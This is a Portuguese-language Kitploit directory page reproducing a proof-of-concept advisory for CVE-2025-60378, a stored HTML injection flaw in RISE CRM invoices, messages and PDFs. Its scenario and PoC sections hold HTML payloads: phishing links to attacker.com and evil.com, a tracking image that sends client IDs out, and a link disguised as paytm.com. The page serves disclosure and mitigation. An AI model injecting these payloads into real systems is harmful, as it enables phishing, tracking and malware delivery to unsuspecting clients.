Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-60378 — Prova de conceito para injeção de HTML armazenada no RISE CRM, demonstrando como usuários autenticados podem injetar HTML malicioso em faturas e mensagens, levando a phishing e distribuição de malware por meio de e-mails e PDFs automatizados. | Kitploit
Ferramentas/GitHubGitHub/ajansha/cve-2025-60378
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPhishingSegurança WebAprendizado e Educação
GitHubajansha/cve-2025-60378

CVE-2025-60378

Prova de conceito para injeção de HTML armazenada no RISE CRM, demonstrando como usuários autenticados podem injetar HTML malicioso em faturas e mensagens, levando a phishing e distribuição de malware por meio de e-mails e PDFs automatizados.

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-60378: Injeção de HTML Armazenada no RISE Ultimate Project Manager & CRM

⚠️ Aviso de Segurança
Uma vulnerabilidade crítica de Injeção de HTML Armazenada que afeta faturas, mensagens e comunicações automatizadas

CVE Severity CVSS Product


📋 Visão Geral

Uma vulnerabilidade crítica de Injeção de HTML Armazenada foi descoberta no RISE Ultimate Project Manager & CRM que permite que usuários autenticados injetem HTML malicioso em itens de linha de faturas, notas de clientes e módulos de mensagens. Esse conteúdo injetado persiste no banco de dados e é automaticamente renderizado em e-mails voltados ao cliente, PDFs e comunicações de chat, possibilitando ataques de phishing em larga escala, comprometimento de e-mail corporativo e entrega de malware via e-mail/PDF.

🎯 Versões Afetadas

  • Produto: RISE - Ultimate Project Manager & CRM
  • Versões Vulneráveis: < 3.9.4
  • Versão Corrigida: 3.9.4+

🔍 Detalhes da Vulnerabilidade

AtributoValor
ID CVECVE-2025-60378
TipoInjeção de HTML Armazenada
CWECWE-79
Vetor de AtaqueRede/Remoto
AutenticaçãoNecessária (Privilégio Baixo)
Interação do UsuárioNenhuma
SeveridadeALTA
CVSS v3.18.1 - Alta
DescobridorAjansha Shankar

Descrição

O RISE CRM não sanitiza e codifica adequadamente o conteúdo HTML em vários campos editáveis pelo usuário, incluindo faturas, mensagens e notas de clientes. Quando usuários autenticados injetam payloads HTML nesses campos, o conteúdo é armazenado no banco de dados sem filtragem adequada. Posteriormente, esse HTML malicioso é automaticamente renderizado em e-mails voltados ao cliente, anexos PDF e módulos de mensagens/chat sem escape adequado. Faturas recorrentes e mensagens automatizadas amplificam o ataque ao distribuir conteúdo malicioso para múltiplos destinatários simultaneamente.

Componentes Afetados

  • ✗ Itens de linha de faturas (campo de descrição)
  • ✗ Módulo de notas/mensagens do cliente
  • ✗ Sistema de chat e mensagens
  • ✗ Módulo de geração de extratos de clientes
  • ✗ Sistema de e-mail automatizado (faturas recorrentes, lembretes)
  • ✗ Anexos PDF

Causa Raiz

  • ❌ Sanitização insuficiente de entrada nos campos de faturas, mensagens e notas de clientes
  • ❌ Codificação de saída HTML ausente em modelos de e-mail e geração de PDF
  • ❌ Nenhuma validação de conteúdo antes do armazenamento no banco de dados
  • ❌ Falta de restrições sobre HTML/JavaScript em comunicações com clientes
  • ❌ Sistemas automatizados distribuem conteúdo não validado sem filtragem adicional

💥 Impacto

Implicações de Segurança

  • 🎣 Phishing em Larga Escala: O conteúdo injetado pode se passar por comunicações legítimas e redirecionar múltiplos clientes para sites controlados pelo atacante
  • 💼 Comprometimento de E-mail Corporativo: Faturas e mensagens maliciosas enviadas aos clientes parecem vir de fonte confiável
  • 💬 Mensagens Comprometidas: Payloads maliciosos em chat/mensagens alcançam membros da equipe e clientes diretamente
  • 🦠 Distribuição de Malware: Links maliciosos incorporados ou iframes entregam malware via e-mail/PDF/mensagens
  • 🔄 Distribuição Automatizada de Ataques: Faturas recorrentes e mensagens automatizadas garantem que o payload alcance múltiplos destinatários sem intervenção manual
  • 👥 Ataque Multi-Vetor: Superfícies de ataque combinadas de e-mail, PDF e mensagens aumentam a taxa de comprometimento bem-sucedido

Avaliação da Tríade CIA

FatorImpactoExplicação
Confidencialidade🔴 ALTACredenciais de clientes e dados sensíveis podem ser coletados via phishing
Integridade🔴 ALTAConteúdo malicioso pode modificar a percepção de comunicações e relações comerciais
Disponibilidade🟡 BAIXAImpacto direto limitado na disponibilidade do sistema

Cenários de Ataque no Mundo Real

Cenário 1: Campanha de Phishing Baseada em Faturas

Um atacante com acesso de gerente de projeto de baixo privilégio cria uma fatura com HTML malicioso:

root@kitploit:~
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>

A fatura é enviada para mais de 100 clientes via e-mail automatizado. Todos os clientes recebem o que parece ser uma fatura legítima direcionando-os para um site de phishing. O atacante coleta credenciais de múltiplas vítimas simultaneamente.

Cenário 2: Ataque Baseado em Mensagens

Um atacante injeta HTML malicioso em uma mensagem de cliente:

root@kitploit:~
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>

Todos os membros da equipe e clientes recebem a mensagem no chat, clicando em links para baixar malware.

Cenário 3: Entrega de Malware via Fatura Recorrente

Um atacante configura uma fatura recorrente com payload de entrega de malware. Todo mês, os clientes recebem automaticamente faturas com conteúdo malicioso incorporado, fornecendo um vetor de ataque persistente.

🧪 Prova de Conceito

Configuração do Ambiente

  • Acesso ao painel administrativo do RISE CRM com permissões de criação de faturas/mensagens
  • Qualquer versão anterior à 3.9.4

Etapas do PoC

Etapa 1: Acessar a Criação de Fatura ou Mensagem

root@kitploit:~
Navegue até: Painel do RISE CRM → Faturas/Mensagens → Criar Nova

Etapa 2: Injetar Payload HTML no Campo de Descrição/Mensagem

root@kitploit:~
<a href="https://attacker.com">Click here to view invoice</a>

Etapa 3: Adicionar Imagem Maliciosa com Redirecionamento

root@kitploit:~
<a href="https://evil.com" target="_blank">
  <img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>

Etapa 4: Adicionar Payload de Estilo Enganoso

root@kitploit:~
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>

Etapa 5: Configurar Distribuição Recorrente

  • Salve o registro
  • Ative a opção "Recorrente" (se disponível para faturas/mensagens)
  • Defina a frequência (semanal, mensal, etc.)
  • O sistema envia automaticamente para todos os clientes relevantes

Etapa 6: Verificar o Vetor de Ataque

  • Verifique a caixa de entrada de e-mail do cliente
  • Verifique as mensagens/chat do cliente
  • Abra o anexo PDF
  • Observe o HTML malicioso renderizado em todos os canais

Resultado Esperado

✅ HTML injetado é renderizado em e-mails, PDFs e mensagens sem escape ✅ Links são clicáveis e redirecionam para sites do atacante ✅ Imagens carregam de servidores controlados pelo atacante ✅ O conteúdo persiste em todas as comunicações futuras com clientes ✅ A distribuição recorrente alcança múltiplos destinatários automaticamente

🛡️ Mitigação

Para Usuários Finais

  1. ✅ Atualize Imediatamente: Atualize para o RISE CRM v3.9.4 ou posterior
  2. 🔍 Audite Todos os Registros: Revise faturas, mensagens e notas de clientes recentes em busca de conteúdo HTML suspeito
  3. ⚠️ Notificação de Clientes: Alerte todos os clientes se faturas ou mensagens suspeitas foram enviadas
  4. 🔄 Redefinição de Credenciais: Recomende que os clientes alterem senhas se clicaram em links
  5. 📝 Monitore a Atividade: Verifique logs de auditoria em busca de modificações não autorizadas em faturas/mensagens
  6. 🔐 Desative Recorrências: Desative temporariamente faturas/mensagens recorrentes até a correção

📚 Referências

  • CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Páginas Web
  • OWASP: Cross-site Scripting (XSS)
  • OWASP: Injeção de HTML
  • OWASP: Codificação de Saída
  • Entrada Oficial do CVE-2025-60378

📅 Linha do Tempo

DataEvento
A definirVulnerabilidade descoberta
A definirFornecedor notificado
A definirCVE-2025-60378 atribuído
A definirCorreção lançada (v3.9.4)
A definirDivulgação pública

👤 Créditos

Descoberto por: Ajansha Shankar

LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

📊 Avaliação CVSS v3.1

Vetor: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Pontuação: 8.1 (ALTA)

Detalhamento:

  • Vetor de Ataque (AV:N): Rede - Pode ser explorado remotamente
  • Complexidade do Ataque (AC:L): Baixa - Nenhuma condição especial necessária
  • Privilégios Necessários (PR:L): Baixos - Requer usuário autenticado com privilégios básicos de gerente de projeto
  • Interação do Usuário (UI:N): Nenhuma - Nenhuma interação do usuário necessária; sistemas automatizados distribuem o payload
  • Escopo (S:U): Inalterado - O impacto é limitado ao componente vulnerável
  • Confidencialidade (C:H): Alta - Potencial roubo de credenciais via phishing para múltiplos clientes
  • Integridade (I:H): Alta - Conteúdo malicioso pode ser injetado e entregue a múltiplos destinatários
  • Disponibilidade (A:N): Nenhuma - Sem impacto na disponibilidade do sistema

📧 Contato

Para perguntas ou informações adicionais:

  • LinkedIn: https://www.linkedin.com/in/ajansha-shankar/

⭐ Se esta pesquisa foi útil, considere dar uma estrela neste repositório!

🔔 Mantenha-se atualizado: Observe este repositório para atualizações sobre esta e futuras pesquisas de segurança.

  • CVE-2025-60374 - XSS Armazenado no Chatbot do Perfex CRM
  • CVE-2025-55903 - Injeção de HTML Armazenada em Faturas do Perfex CRM
  • CVE-2025-60375 - Bypass de Autenticação no Perfex CRM
Baixar ferramenta